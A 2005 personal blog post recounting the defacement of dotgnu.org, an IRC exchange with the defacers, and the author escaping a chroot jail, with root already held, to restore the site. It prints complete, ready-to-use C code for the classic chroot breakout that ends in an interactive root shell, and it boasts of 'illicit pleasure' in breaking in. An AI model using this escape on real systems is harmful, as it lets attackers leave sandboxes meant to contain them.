< November 2005 >
SuMoTuWeThFrSa
   1 2 3 4 5
6 7 8 9101112
13141516171819
20212223242526
27282930   
Fri, 11 Nov 2005:

I don't usually boast about my hacking exploits, but this is one occasion when I can claim that I did the right thing by breaking the security of a linux server. Let me explain the scenario. Dotgnu.org was cracked by a bunch of script kiddies on November 1st. They defaced the website and left their message all over the website.

Cracker's message instead of dotgnu.org

These were a bunch of script kiddies who were using a canned script targetting phpnuke installation on the same box which was serving getdotgnu.com. We managed to track them down immediately, thanks to help of many dotgnu people (and others as well). Some people had very funny stuff to say about the incident like this blog. It got to the stage where the kids came to #dotgnu and sort of apologized. They all do when pushed to a wall and held there.

[02:28] <DigitalMind> no comments
[02:28] <DigitalMind> peace
[02:32] <Belial-> Digitalmind: I wouldn't call you hackers but script kiddies
[02:32] <Digitalmind> we arent hackers
[02:32] <Digitalmind> if u think we are script kids
[02:32] <Digitalmind> we dont really care
[02:33] <Digitalmind> im the founder of digitalmind
....
[02:39] <Digitalmind> we never called our selfs hacker
[02:39] <Belial-> Digitalmind: you're in the wrong crowd if you want praise
[02:39] <Belial-> what you're doing is easy and wrong
....
[02:40] <Digitalmind> and i came here in peace
[02:40] <Digitalmind> i dont want to fight
[02:40] <Digitalmind> and shit like that
[02:42] <Belial-> if you ever grow out of that phase maybe you can be a real programmer too
[02:42] <t3rmin4t0r> some of us did
....
[02:47] <Digitalmind> peace
[02:47] <t3rmin4t0r> forgiven, but not forgotten

For the last 10 days the server has just been hanging there without a proper admin to restore the code. Thankfully I had a login on that particular box which hosts the server, because it hosts this blog too. Also we had got a new domain called maybe.dotgnu.info for the google Summer of Code intern (krokas), which was running debian. The first domain was running hardened gentoo (from what I can read/guess). I had root on maybe.dotgnu.info, but not on the gentoo chroot which was hosting dotgnu.org and t3.dotgnu.info. So here's how you break out of a chroot if you already have root access and why FreeBSD jail() is a LOT safer than a chroot'ed server.

The exploit is based on the fact that chroots are flat. There is no such thing as a nested chroot. So when you chroot from inside a chroot, you are doing the equivalent of a single chroot. The scary part is that the application which did a chroot can traverse out if it has root privileges - but which is not applicable for an application started inside a chroot. Voila, an easily exploitable hole.

int main()
{
	int i;
	char dirtemp[] = "/tmp/chroot-breaker-XXXXXX";
	
	assert(mkdtemp(dirtemp) != NULL);
	assert(chroot(dirtemp) >= 0);
	
	for(int i = 0; i < 1024; i++) chdir("..");
	
	assert(chroot(".") >= 0);
	
	assert(execl("/bin/sh", "-i", NULL) >= 0);
	return 0;
}

The ready to use break_chroot.c. Could it be any more simpler ? So next time you set up a server properly, make sure you set it up with something like User Mode Linux or Xen, rather than just relying on a chroot for security.

And to think I spent 4 hours writing shell code for the do_brk() attack vector. Sometimes simple solutions work out very nicely indeed. Anyway the important part is that, dotgnu.org is back and running.

I felt that old rush of illicit pleasure coming back - after all, God, root, what is difference ?.

--
* My next box is your linux server

posted at: 02:40 | path: /hacks | permalink | Tags: ,